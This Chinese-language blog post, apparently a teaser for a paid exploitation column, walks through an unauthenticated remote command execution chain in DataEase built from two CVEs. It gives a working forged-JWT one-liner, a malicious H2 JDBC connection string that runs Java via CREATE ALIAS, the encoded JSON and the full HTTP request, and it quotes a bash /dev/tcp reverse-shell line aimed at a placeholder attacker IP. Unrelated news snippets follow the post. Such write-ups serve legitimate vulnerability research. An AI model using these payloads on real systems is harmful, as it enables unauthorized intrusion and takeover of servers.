发布时间:2026/8/29 18:37:40
发现假令牌还放行?开发不会是故意的吧?DataEase 双 CVE 组合实现未授权远程命令执行 漏洞利用演示视频点击直达 DataEase双CVE链式 RCE 深度拆解JWT 绕过H2 注入完整攻击链路发生了什么DataEase 是个开源的数据可视化平台很多企业用它搭 BI 仪表盘。2025 年爆出的这个 CVE-2025-32966说的是它的测试数据库连接功能有问题——用户填的数据库连接串服务器想都不想就原样执行了。但单独这个漏洞还需要管理员账号才能利用。真正让它变成未授权 RCE的是另一个 CVE-2025-49001DataEase 的 JWT 校验逻辑有缺陷验出签名是假的之后只写个日志然后——把请求放行了。两个漏洞凑在一起攻击者不需要任何账号自己伪造一张管理员令牌然后在数据库连接串里塞一段 Java 代码服务器就乖乖执行了。我复现的时候一个请求下去服务器上直接以 root 身份创建了文件这还只是touch命令。能执行任意系统命令意味着什么不用我多说了吧。有多严重——POC验证先把完整的利用过程走一遍每一步都有数据包跟着做就能复现。第一步伪造管理员 JWT因为 CVE-2025-49001 的存在服务器验签失败也不拦截所以密钥随便填。用 Python 一行命令生成python -c import jwt,time; print(jwt.encode({uid:1,oid:1,exp:int(time.time())3600}, any-secret, algorithmHS256))几个字段说一下uid: 1DataEase 默认 admin 就是 uid1伪造管理员身份oid: 1组织编号这个字段不能缺缺了后端会报空指针exp过期时间一小时够用any-secret签名密钥随便填——服务器验出来是假的也不拦输出一长串字符就是你的管理员通行证第二步构造恶意 H2 连接串这是漏洞的核心。H2 数据库有个INIT参数表示连接一建立就自动执行里面的 SQL。而 H2 支持CREATE ALIAS注册自定义函数函数体可以直接写 Java 源码H2 会在运行时编译执行。我们用最无害的touch /tmp/pwned来验证jdbc:h2:mem:pwn;MODEMSSQLServer;INITCREATE ALIAS EXEC AS $$void exec() throws java.io.IOException { Runtime.getRuntime().exec(new String[]{touch,/tmp/pwned})\; }$$\;CALL EXEC()逐段拆解jdbc:h2:mem:pwn连接一个叫 pwn 的内存数据库用完即弃INIT...连接建立时自动执行的 SQL一切罪恶的入口CREATE ALIAS EXEC AS $$...$$注册一个叫 EXEC 的函数实现是$$里的 Java 源码Runtime.getRuntime().exec(...)执行系统命令new String[]{touch,/tmp/pwned}在服务器上创建一个文件\;转义的分号。因为连接串本身用;分隔参数INIT 里的 SQL 分号必须转义否则会被当成 URL 参数分隔符截断CALL EXEC()调用刚注册的函数触发 Java 代码运行第三步编码并发送把上面的连接串封装成 JSON注意 JSON 里双引号要转义为\\;要写成\\;{jdbc:jdbc:h2:mem:pwn;MODEMSSQLServer;INITCREATE ALIAS EXEC AS $$void exec() throws java.io.IOException { Runtime.getRuntime().exec(new String[]{\touch\,\/tmp/pwned\})\\; }$$\\;CALL EXEC(),username:,password:,driver:org.h2.Driver}对整段 JSON 做 base64 编码echo -n 上面整段JSON | base64 -w 0然后构造完整 HTTP 请求POST /de2api/datasource/validate HTTP/1.1 Host: {业务目标ip}:8100 Content-Type: application/json X-DE-TOKEN: 第一步伪造的JWT {name:p1,type:h2,configuration:base64编码后的JSON}发送之后你会看到响应是 400——别慌这是正常现象响应头里的DE-GATEWAY-FLAG写着 “The Token’s Signature resulted invalid…”证明服务器验出了假章。但因为 CVE-2025-49001 的缺陷请求被放行了命令已经执行完了。400 只是因为验签失败时抢占了响应输出流后面控制器没法再写干净输出。判断成功与否看副作用不看状态码。进容器验证docker compose exec web ls -la /tmp/pwned文件存在远程命令执行成立。环境怎么搭直接用 Vulhub一行命令docker compose up -d启动后访问http://{业务目标ip}:8100看到 DataEase 登录页就就绪了。本漏洞不需要登录我们自己伪造管理员身份。真正的门槛在哪到这里你已经能在服务器上执行任意命令了。网上关于这个漏洞的教程十篇有九篇就停在这一步——演示个touch、执行个id然后告诉你漏洞复现成功。但真正的门槛是从能执行命令走到拿到交互式 Shell。我第一次复现的时候在这一步卡了整整一下午。最开始用最经典的 bash 反弹bash-i/dev/tcp/{攻击ip}/444401塞进 Java 的exec()里发出去攻击机nc -lvnp 4444开监听等了半天——什么都没有。排查了好一会儿才发现第一个坑这个 Vulhub 镜像里根本没有 bash只有/bin/sh。Java 调用/bin/bash直接报No such file or directory命令启动失败。行换成/bin/sh总行了吧还是不行。第二个坑/dev/tcp是 bash 独有的伪设备特性容器里的 sh 根本不支持这个语法命令执行了但静默失败。而且还有第三个坑Runtime.getRuntime().exec()的数组模式不会解析 shell 重定向符号 |。就算有 bash直接把重定向命令扔给 exec 也会失效。那用 base64 编码绕过重定向符号呢把整条反弹命令 base64 编码交给sh -c echo xxx|base64 -d|bash执行总该绕过重定向的坑了吧结果还是不行——容器里没有 bashbase64 -d|bash这一步直接失败。换成base64 -d|sh呢sh 不支持/dev/tcp解码出来的命令照样弹不回来。到这里我已经试了四种思路touch 文件每次都能成功说明漏洞链路完全通但反弹 Shell 就是拿不到。这种感觉比漏洞利用失败还难受——你知道差一点但就是绕不过去。我甚至开始怀疑是不是网络不通专门用 curl 测了一下容器出网结果完全正常——问题就出在反弹方式本身。中间还踩了一堆编码转义的坑Java 代码里的分号没转义导致 JDBC URL 格式错误、匿名内部类引用可变变量导致 Java 编译失败、base64 编码带隐形换行导致 payload 截断……每一个都能让你卡半天。最后我换了个完全不同的思路才一把梭成功。如果你想走完这条路我把从环境搭建到最终反弹 Shell 的完整过程——包括每一次试错、每一次失败的排查思路、最终绕过方案的原理拆解以及一个一键利用脚本——都整理在了专栏里。本篇文章完整版详见点击直达【GetShell】DataEase H2 JDBC远程命令执行漏洞CVE-2025-32966CVE-2025-49001点击直达专栏的名字叫高危漏洞深度利用—零基础GetShell的全链路实战指南。核心就是不止于 POC 复现每篇文章必须走到拿下服务器。如果你不想自己从头踩一遍 bash 不存在、sh 不支持 /dev/tcp、exec 不解析重定向的坑可以翻翻。复现过程中有问题直接评论区留言我看到了会回。本文仅用于合法的安全研究和教育目的。请确保你测试的系统是你拥有合法授权的靶场环境。POC 复现每篇文章必须走到拿下服务器。如果你不想自己从头踩一遍 bash 不存在、sh 不支持 /dev/tcp、exec 不解析重定向的坑可以翻翻。

相关新闻

2026/8/29 18:37:40

在SAP中更快、更灵活地执行客户端复制的方法

如果您在管理SAP系统架构,那么您一定在某些场景下执行过客户端复制。客户端复制有多种业务场景,例如在已有系统上为开发或测试目的创建新客户端,或在特定客户端内进行数据刷新。执行客户端复制比恢复或运行整个数据库备份更简单、”侵入性”更…

2026/8/29 18:37:40

STM32编码器模式测速实践:LAT1447直流减速电机完整方案

搞过直流减速电机测速的朋友都知道,测速本身不是难事,难的是“测出来能不能用、稳不稳、方向对不对”。LAT1447 这类带 AB 相霍尔编码器的减速电机,在智能小车、机器人底盘、云台等场景里非常常见,配合 STM32 的定时器编码器模式&…

2026/8/29 18:37:40

单张图像估算物体体积:从几何模型到深度学习的实战解析

1. 从二维到三维:图像体积估算的挑战与价值在计算机视觉和三维重建领域,我们常常会遇到一个看似简单实则棘手的问题:给你一张物体的二维图像,如何估算出它在真实世界中的体积?这听起来有点像“看图猜重量”&#xff0c…

2026/8/29 18:47:41

PortSwigger网络缓存欺骗(4)

这是第四期的网络缓存欺骗,为了防止大家的头脑已经转不过来了,今天再来重新梳理下并区分下缓存静态路径与缓存静态资源“静态资源”:一种让缓存服务器认为“这个响应可以缓存”的特征。/resources:只是网站上可能存在的一个具体静…

2026/8/29 18:47:41

论文一直拖延写不完?2026 用5步自救清单帮你先动起来

论文拖了两个月一个字没动,这种"开了头却迈不出下一步"的卡顿,几乎每个写作者都经历过。问题往往不在能力,而在启动成本太高、反馈太慢。把"写完整篇"这个大目标,拆成"先出一个能反复改的骨架"&…

2026/8/29 18:47:41

Windows 安装 OpenClaw 图文实操教程,TopClaw内置六万技能免费

安装前的准备,这些坑我帮你踩过了 最近在折腾OpenClaw,一开始我以为就是普通软件,双击下一步就完事了。结果发现绕了不少弯子,为了让大家少走弯路,我把自己实操验证过的步骤整理出来,新手照着抄作业就行。先…

2026/8/29 18:47:41

OpenCV与Python智能图像处理:从环境搭建到车辆检测项目实战

简介:计算机视觉是人工智能领域的关键分支,旨在让计算机像人一样理解和处理视觉信息。其核心原理是通过算法从图像或视频中提取特征、识别模式并做出决策。OpenCV作为行业标准库,结合Python语言,为开发者提供了高效实现计算机视觉…

2026/8/29 18:42:41

Node系列 · Express:基本使用

Node系列 Express:基本使用 Express 是 Node 生态最老牌、最流行的 Web 框架——Koa 是同一作者(TJ)后续更轻量的作品,Fastify / NestJS 是更新的高性能替代。本章从零起步搭建一个 Express 服务,理解它的核心约定。 …

2026/8/28 16:16:17

[光学原理与应用-521]:对光的错误理解与纠偏

首先光是一种能量的载体和形态,宏观上观察到的光是由无数个微观的光量子组成的,每个光子在产生的瞬间,其在真空的空间中以确定不变的速度沿着一个初始的方向一直向前,在微观层面,每个光量子的运动轨迹是以波函数所展现…

2026/8/28 16:16:21

SIP通话转接原理与REFER方法实战解析

1. 通话转接不是“挂断再拨号”,而是SIP会话的动态重定向你有没有遇到过这样的场景:客服坐席A正在和客户通电话,突然需要把这通对话无缝转给专家坐席B,客户完全感知不到中间的断连——既没听到忙音,也没被要求重新拨号…

2026/8/28 16:16:22

Kolla-ansible单节点OpenStack部署实战:从环境准备到排坑指南

1. 为什么选择Kolla-ansible来部署单节点OpenStack?如果你正在寻找一种能把OpenStack从“概念”快速变成“可用的实验环境”的方法,那么Kolla-ansible几乎是当前最主流、最省心的选择。我见过太多人卡在手动编译依赖、配置服务、处理版本冲突的泥潭里&am…

2026/8/29 0:01:10

etc目录下的profile.d文件目录设置环境变量和全局脚本shell

一、设置环境变量etc目录下的profile.d文件目录 /etc/profile.d1、编写 vi test.sh文件内容# jdk变量 export ZHK_HOME/root export PATH$PATH:$ZHK_HOME/test # 可以取出来ZHK_HOME变量给ZZZ_HOME赋值 export ZZZ_HOME${ZHK_HOME}/test2、刷新 执行source /etc/profile 命令使…

2026/8/29 0:01:10

【JavaScript】内存管理-垃圾回收机制-内存泄露

内存管理 C 语言这样的底层语言一般都有底层的内存管理接口,比如 malloc()和free()。 而 JavaScript 是在创建变量(对象,字符串等)时自动进行了分配内存,并且在不使用它们时“自动”释放。释放的过程称为垃圾回收。 整…

2026/8/29 0:01:10

Labgrid-MCP:为嵌入式硬件实验室接入AI Agent操控能力

Labgrid-MCP 的目标是把 MCP(Model Context Protocol)能力延伸到真实嵌入式硬件实验室:AI Agent 通过一个标准化的 MCP Server,就能查看目标板状态、控制上电断电、复位开发板、读取串口日志,甚至执行镜像刷写。对于经…

2026/8/28 16:16:48

实测才敢推 AI论文网站 2026最新测评与推荐

2026年真正好用的AI论文网站,核心看生成的论文质量、低AI味、格式正确、学术适配四大指标。综合实测,千笔AI、ThouPen、豆包、DeepSeek、Grammarly 是当前最值得推荐的梯队,覆盖从免费到付费、从中文到英文、从文科到理工的全场景需求。一、综…

2026/8/28 16:16:50

2026必备!AI论文网站测评:最新推荐与深度对比

2026年真正好用的AI论文网站,核心看生成的论文质量、低AI味、格式正确、学术适配四大指标。综合实测,千笔AI、ThouPen、豆包、DeepSeek、Grammarly 是当前最值得推荐的梯队,覆盖从免费到付费、从中文到英文、从文科到理工的全场景需求。 一、…

2026/8/28 11:06:45

摆脱论文困扰!盘点2026年全网爆红的的AI论文写作工具

一天写完毕业论文在2026年已不再是天方夜谭。2026年最炸裂、实测能大幅提速的AI论文写作工具,覆盖选题构思、文献整理、内容生成、格式排版等核心场景,真正帮你高效搞定论文难题。 一、全流程王者:一站式搞定论文全链路(一天定稿首…